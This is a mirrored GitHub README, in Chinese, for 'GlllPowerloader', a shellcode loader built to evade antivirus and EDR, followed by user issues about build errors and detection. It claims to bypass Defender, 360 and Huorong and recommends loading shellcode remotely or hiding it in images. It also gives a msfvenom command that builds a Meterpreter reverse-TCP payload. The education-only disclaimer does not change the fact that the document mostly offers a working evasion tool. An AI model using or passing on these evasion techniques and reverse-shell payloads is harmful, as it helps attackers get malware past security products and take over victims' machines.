Giter Club home page Giter Club logo

glllpowerloader's Introduction

GlllPowerloader

1.前言

  • 刚开始可以免杀主流杀软的,不过后面肯定会被乱杀,开源的目的是学习恶意代码和自动化脚本
  • 本人并不推荐shellcode加密,一般的加密算法都会使程序熵增,可以使用远程加载和图片隐写的方式分离shellcode

2.功能

功能 描述
1.免杀加载器 各种方式加载shellcode,绕过AV/EDR
2.文件格式转换 Windows中文件格式之间的转换
3.自动化文件托管 将文件托管到:https://transfer.sh/

3.使用

0x01.环境安装

您必须下载并安装以下环境:

1.Mingw64(C/C++):https://github.com/niXman/mingw-builds-binaries/releases/download/12.2.0-rt_v10-rev2/x86_64-12.2.0-release-posix-seh-msvcrt-rt_v10-rev2.7z

解压完以后,将bin目录添加至环境变 量即可

使用Git下载项目

git clone https://github.com/INotGreen/GlllPowerloader.git
cd GlllPowerLoader-master
pip install -r requirements.txt
start.bat

0x02.使用方法

  • 大部分已经不能免杀了,不过稍微改一下还是能过主流AV
  • 必须保证你的shellcode是干净的,否则还是会被Windows Defender抓住,您可以学习Reflective DLL InjectionsRDI来自定义shellcode
  • 如果你在使用的过程中被defender查杀了,有可能是您使用的C2工具shellcode内存被抓住了,而不一定是加载器的问题
  • 加载方式采用URL分离加载,所以你需要将shellcode(bin文件)上传或者托管至网站,并且记下URL

Metasploit:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.0 LPORT=4488 -f raw -o payload.bin

0x03.视频演示

示例GIF

4.更新

[+] 2022年12.21,Powerloader发布

[+]2023 年11.15, 删除冗余的功能,优化代码,(之前的版本涉及语言安装环境太多了,使用太麻烦,为了简便就留C/C++的加载器)

[+]2023年11.20,免杀defender,360,火绒(前提是shellcode内存是没有被标记的)

免杀加载器正在更新中。。。

5.免责声明

该工具仅用于网络安全教育和研究,禁止用于非法途径,我对您由使用或传播等由此软件引起的任何行为和/或损害不承担任何责任。您对使用此软件的任何行为承担全部责任,并承认此软件仅用于教育和研究目的。下载本软件或软件的源代码,您自动同意上述内容。

6.致谢

https://github.com/icyguider/Shhhloader

glllpowerloader's People

Contributors

inotgreen avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

glllpowerloader's Issues

GCC编译版本用?

MinGW-W64 Online Installer

[MinGW-W64-install.exe](https://sourceforge.net/projects/mingw-w64/files/Toolchains%20targetting%20Win32/Personal%20Builds/mingw-builds/installer/mingw-w64-install.exe)

MinGW-W64 GCC-8.1.0

[x86_64-posix-sjlj](https://sourceforge.net/projects/mingw-w64/files/Toolchains%20targetting%20Win64/Personal%20Builds/mingw-builds/8.1.0/threads-posix/sjlj/x86_64-8.1.0-release-posix-sjlj-rt_v6-rev0.7z)
[x86_64-posix-seh](https://sourceforge.net/projects/mingw-w64/files/Toolchains%20targetting%20Win64/Personal%20Builds/mingw-builds/8.1.0/threads-posix/seh/x86_64-8.1.0-release-posix-seh-rt_v6-rev0.7z)
[x86_64-win32-sjlj](https://sourceforge.net/projects/mingw-w64/files/Toolchains%20targetting%20Win64/Personal%20Builds/mingw-builds/8.1.0/threads-win32/sjlj/x86_64-8.1.0-release-win32-sjlj-rt_v6-rev0.7z)
[x86_64-win32-seh](https://sourceforge.net/projects/mingw-w64/files/Toolchains%20targetting%20Win64/Personal%20Builds/mingw-builds/8.1.0/threads-win32/seh/x86_64-8.1.0-release-win32-seh-rt_v6-rev0.7z)
[i686-posix-sjlj](https://sourceforge.net/projects/mingw-w64/files/Toolchains%20targetting%20Win32/Personal%20Builds/mingw-builds/8.1.0/threads-posix/sjlj/i686-8.1.0-release-posix-sjlj-rt_v6-rev0.7z)

完全不知道下哪个来编译

.dll Entrypoint

first thanks for sharing this great project, second i want to know what is the entrypoint used when i execute dll ?

有几个BUG

问题1:免杀加载器模式下bin文件加载BUG
1.C/C++ ShellCode(bin)
1.processhollowing 模式加载不到bin文件,根目录还有绝对路径都不行。其他模式根目录可以
Traceback (most recent call last):
File "F:\Gllloader-main\loader.py", line 891, in
main(stub, args.file, args.out, key, args.process, method, args.no_randomize, args.verbose, args.dll_sandbox)
File "F:\Gllloader-main\loader.py", line 761, in main
with open(tempfile, 'wb') as contents:
FileNotFoundError: [Errno 2] No such file or directory: 'temp_.\payload.bin'
问题2:生成后的exe 60秒后进程自动消失然后就没然后了。测试用的CS 4.4的payload.bin 编译环境W10 GCC 8.1.0 py3.10

ps2exe模式加载报错 被wd杀

师傅你好,今天一直在看你发的视频学习,想请教几个问题
1、ps2exe加载模式 在环境为win11,powershell均为Unrestricted模式下报错
image

2、我在虚拟机winserver2019测试defender还是被杀了,不知道哪里出问题了

还需要多学习,打扰师傅

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.